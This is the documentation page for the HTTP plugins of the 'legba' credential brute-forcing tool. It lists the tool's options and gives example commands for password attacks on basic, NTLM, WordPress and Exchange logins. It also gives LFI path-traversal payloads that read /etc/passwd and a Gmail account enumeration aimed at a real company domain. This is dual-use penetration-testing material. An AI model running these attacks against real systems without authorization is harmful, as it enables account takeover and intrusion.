-
-
Notifications
You must be signed in to change notification settings - Fork 86
HTTP
A set of plugins supporting http basic authentication, NTLMv1, NTLMv2, multipart form requests, standard HTTP requests, CSRF token grabbing and HTTP pages enumeration.
Name | Description |
---|---|
http | HTTP request. |
http.basic | HTTP basic authentication. |
http.enum | HTTP pages enumeration. |
http.form | HTTP multipart form request. |
http.ntlm1 | NTLMv1 authentication over HTTP. |
http.ntlm2 | NTLMv2 authentication over HTTP. |
http.vhost | HTTP virtual host enumeration. |
Name | Description |
---|---|
--http-success-codes <HTTP_SUCCESS_CODES> |
Comma separated status codes to consider as successful authentication attempts for HTTP based plugins [default: "200, 301, 302"] |
--http-random-ua |
Randomize requests User-Agent |
--http-success-string <HTTP_SUCCESS_STRING> |
Check for the presence of this string in the response in order to recognize a succesful attempt |
--http-failure-string <HTTP_FAILURE_STRING> |
Check for the presence of this string in the response in order to recognize a failed attempt |
--http-follow-redirects |
Follow HTTP redirects |
--http-method <HTTP_METHOD> |
Request method for HTTP based plugins [default: GET ] |
--http-headers <HTTP_HEADERS>... |
Request headers for HTTP based plugins |
--http-csrf-page <HTTP_CSRF_PAGE> |
For each request grab a CSRF token from this page |
--http-csrf-regexp <HTTP_CSRF_REGEXP> |
Regular expression to use to grab the CSRF token name and value [default: "<input type=\"hidden\" name=\"(token)\" value=\"([^\"]+)\"" ] |
--http-payload <HTTP_PAYLOAD> |
Request payload (query string, post body or form data) for HTTP based plugins |
--http-enum-ext <HTTP_ENUM_EXT> |
File extension for HTTP enumeration [default: php ] |
--http-enum-ext-placeholder <HTTP_ENUM_EXT_PLACEHOLDER> |
File extension placeholder for HTTP enumeration wordlist [default: %EXT% ] |
--http-ntlm-domain <HTTP_NTLM_DOMAIN> |
Domain for NTLM authentication over HTTP |
--http-ntlm-workstation <HTTP_NTLM_WORKSTATION> |
Workstation name for NTLM authentication over HTTP [default: CLIENT ] |
--proxy <PROXY> |
Proxy URL |
--proxy-auth <PROXY_AUTH> |
Proxy authentication as username:password |
HTTP Basic Authentication
legba http.basic \
--username admin \
--password wordlists/passwords.txt \
--target http://localhost:8888/
HTTP Request with NTLMv1 Authentication:
legba http.ntlm1 \
--domain example.org \
--workstation client \
--username admin \
--password wordlists/passwords.txt \
--target https://localhost:8888/
HTTP Request with NTLMv2 Authentication:
legba http.ntlm2 \
--domain example.org \
--workstation client \
--username admin \
--password wordlists/passwords.txt \
--target https://localhost:8888/
Targeting an example Microsoft Exchange server via NTLMv2:
legba http.ntlm2 \
--http-ntlm-domain LEGBA \
--username jeff \
--password wordlists/passwords.txt \
-T "https://exchange-server/ews" \
--http-success-codes "200, 500"
HTTP Pages Enumeration:
legba http.enum \
--payloads data/pages.txt \
--target http://localhost:8888/ \
--http-enum-ext php \ # php is the default value for file extensions
--http-success-codes 200
Wordpress plugin discovery using interpolation syntax:
legba http.enum \
--payloads data/wordpress-plugins.txt \
--target http://localhost:8888/wp-content/plugins/{PAYLOAD}/readme.txt \
--http-success-codes 200
LFI vulnerability fuzzing:
legba http.enum \
--payloads data/lfi.txt \
--target http://localhost:8888/ \
--http-success-string "root:"
The data/lfi.txt
would be something like:
?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
...
... and so on ...
...
Google Suite / GMail valid accounts enumeration:
legba http.enum \
--payloads data/employees-names.txt \
--http-success-string "COMPASS" \
--http-success-codes 204 \
--quiet \
--target "https://mail.google.com/mail/gxlu?email={PAYLOAD}@broadcom.com"
HTTP Post Request (Wordpress wp-login.php page):
legba http \
--username admin \
--password wordlists/passwords.txt \
--target http://localhost:8888/wp-login.php \
--http-method POST \
--http-success-codes 302 \ # wordpress redirects on successful login
--http-payload 'log={USERNAME}&pwd={PASSWORD}'
HTTP Post Request (Wordpress xmlrpc.php)
legba http \
--username admin \
--password wordlists/passwords.txt \
--target http://localhost:8888/xmlrpc.php \
--http-method POST \
--http-payload '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>{USERNAME}</string></value></param><param><value><string>{PASSWORD}</string></value></param></params></methodCall>' \
--http-success-string 'isAdmin' # what string successful response will contain
Or using the @ syntax to load the payload from a file:
legba http \
--username admin \
--password wordlists/passwords.txt \
--target http://localhost:8888/xmlrpc.php \
--http-method POST \
--http-payload @xmlrpc-payload.xml \
--http-success-string 'isAdmin'
HTTP Post Request with CSRF Token grabbing:
legba http \
--username admin \
--password wordlists/passwords.txt \
--target http://localhost:8888/ \
--http-csrf-page http://localhost:8888/ \ # where to grab the CSRF token from, or empty if it's the same as --target
--http-csrf-regexp '<input type="hidden" name="(token)" value="([^\"]+)"' \ # regular expression to extract it
--http-method POST \
--http-payload 'user={USERNAME}&pass={PASSWORD}'
Targeting an example Microsoft Exchange server via OWA:
legba http \
--target "https://exchange-server/owa/auth.owa" \
--username "LEGBA\jeff" \
--password wordlists/passwords.txt \
--http-method POST \
--http-payload 'destination=https://exchange-server/&flags=4&username={USERNAME}&password={PASSWORD}' \
--http-success-codes 302 \
--http-success-string 'set-cookie'
- Installation and Building
- Usage & Main Options
- REST API
- Recipes
- Plugins
- AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)
- DNS
- FTP
- HTTP
- IMAP
- Kerberos
- LDAP
- MongoDB
- MQTT
- Microsoft SQL
- MySQL
- Oracle
- Port Scanner
- PostgreSQL
- POP3
- RDP
- Redis
- Samba
- ScyllaDB / Cassandra
- SSH / SFTP
- SMTP
- SOCKS5
- STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ)
- Telnet
- VNC
- Custom Binary